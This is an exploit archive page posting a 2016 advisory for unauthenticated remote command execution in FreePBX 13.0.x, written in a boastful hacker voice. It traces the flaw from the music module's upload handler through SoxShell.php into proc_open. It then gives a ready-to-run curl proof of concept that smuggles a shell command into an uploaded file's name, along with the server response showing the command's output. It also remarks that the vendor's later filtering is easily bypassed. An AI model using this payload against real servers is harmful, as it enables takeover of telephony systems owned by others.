what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

FreePBX 13.0.x Code Execution

FreePBX 13.0.x Code Execution
Posted Sep 7, 2016
Authored by i-Hmx

FreePBX versions prior to 13.0.154 suffer from a remote command execution vulnerability.

tags | exploit, remote
SHA-256 | 319c000813d183950d7b33d2c579b62062547a307f38619721fde20f435e3458

FreePBX 13.0.x Code Execution

Change Mirror Download
Vulnerable software : Freepbx
Tested versions : 13.0.x < 13.0.154
vendor : freepbx.org
Author : i-Hmx
Email : n0p1337@gmail.com
Home : sec4ever.com

Knock knock people , Eg-R1z on the mic again . .
Freepbx is vulnerable to unauthenticated remote command execution due to
multiple weak inputs validation as well as partial authenticaion bypass
Need more technical shit?!
Here u go

File :
/var/www/html/admin/libraries/Composer/vendor/symfony/process/Symfony/Component/Process/Process.php
class Process
{
const ERR = 'err';
const OUT = 'out';

const STATUS_READY = 'ready';
const STATUS_STARTED = 'started';
const STATUS_TERMINATED = 'terminated';

Line 145:
public function __construct($commandline, $cwd = null, array $env =
null, $input = null, $timeout = 60, array $options = array())
{
if (!function_exists('proc_open')) {
throw new RuntimeException('The Process class relies on
proc_open, which is not available on your PHP installation.');
}

--===>>> $this->commandline = $commandline;
$this->cwd = $cwd;


Line 275
$commandline = $this->commandline;

if ('\\' === DIRECTORY_SEPARATOR &&
$this->enhanceWindowsCompatibility) {
$commandline = 'cmd /V:ON /E:ON /C "('.$commandline.')';
foreach ($this->processPipes->getFiles() as $offset =>
$filename) {
$commandline .= '
'.$offset.'>'.ProcessUtils::escapeArgument($filename);
}
$commandline .= '"';

if (!isset($this->options['bypass_shell'])) {
$this->options['bypass_shell'] = true;
}
}

--===>>> $this->process = proc_open($commandline, $descriptors,
$this->processPipes->pipes, $this->cwd, $this->env, $this->options);

Class is being called at

File : /var/www/html/admin/libraries/media/Media/Driver/Drivers/SoxShell.php
Line 118
public function convert($newFilename,$extension,$mime) {
switch($extension) {
case "wav":
switch($this->extension) {
case "sln":
$process = new Process($this->binary.' -t raw -s -b
16 -r 8000 '.$this->track.' -r '.$this->options['samplerate'].' -b
'.$this->options['bitdepth'].' -c 1 '.$newFilename);
break;
case "sln12":
$process = new Proces.................
case "wav16":
---===>> $process = new Process($this->binary.'
'.$this->track.' -t wav -b 16 -r 16000 -c 1 '.$newFilename);
break;
default:
$process = new Process($this->binary.' '.$this->track.' -c
1 '.$newFilename);
break;
}
if(!$this->background) {
---===>> $process->run();
if (!$process->isSuccessful()) {
throw new \RuntimeException($process->getErrorOutput());
}
} else {
$process->start();
if (!$process->isRunning()) {
throw new \RuntimeException($process->getErrorOutput());
}
}
}

Sox shell can be called via multiple parts of the fpbx including the music
module
File : admin/modules/music/Music.class.php
Line : 407
$name = $dname . '.' . $extension;
move_uploaded_file($tmp_name,
$this->tmp."/".$name);
$media->load($this->tmp."/".$name);
foreach($_POST['codec'] as $c) {
--==>> $media->convert($path."/".$dname.".".$c);
}
unlink($this->tmp."/".$name);

this part can be accessed by unauthenticated user and so it's obvious
command execution vulnerable :/

POC :
[root:/lab/fpbx]# curl -i -s -k -X 'POST' \
-H 'User-Agent: sec4ever 1337s' -H 'Referer:
http://x.x.x.x/admin/ajax.php' -H 'Content-Type: multipart/form-data;
boundary=---------------------------317092200613369' \
--data-binary
$'-----------------------------317092200613369\x0d\x0aContent-Disposition:
form-data;
name=\"extension\"\x0d\x0a\x0d\x0a0\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition:
form-data;
name=\"language\"\x0d\x0a\x0d\x0aen\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition:
form-data;
name=\"filename\"\x0d\x0a\x0d\x0afa.wav\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition:
form-data;
name=\"codec[1]\"\x0d\x0a\x0d\x0agsm\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition:
form-data;
name=\"id\"\x0d\x0a\x0d\x0a1\x0d\x0a-----------------------------317092200613369\x0d\x0aContent-Disposition:
form-data; name=\"files[1]\"; filename=\"$(id).wav\"\x0d\x0aContent-Type:
text/plain\x0d\x0a\x0d\x0aEg-R1z ruling you
;)\x0d\x0a-----------------------------317092200613369\x0d\x0a\x0d\x0a' \
'http://x.x.x.x/admin/ajax.php?module=music&command=upload'
HTTP/1.1 500 Internal Server Error
Date: Wed, 07 Sep 2016 17:33:02 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.28
Set-Cookie: lang=en_US
Set-Cookie: PHPSESSID=6j9ei3pn1btu2o6jc1j6mngmp4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
X-Ignore-This: 1
Connection: close
Transfer-Encoding: chunked
Content-Type: application/json

{"error":{"type":"RuntimeException","message":"\/usr\/bin\/sox formats:
can't open input file `groups=498(asterisk).wav': No such file or
directory\n","file":"\/var\/www\/html\/admin\/libraries\/media\/Media\/Driver\/Drivers\/SoxShell.php","line":194}}#


Patching : can be done via adding escapeshellarg to soxshell inputs
Almost fixed in fpbx later versions
# in this version spaces,',`,/,\,<,>,?,&,| are filtered , which can be
super easily bypassed
# make a priv8 , burn another ;)
# From Eg-R1z with Love xD
Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close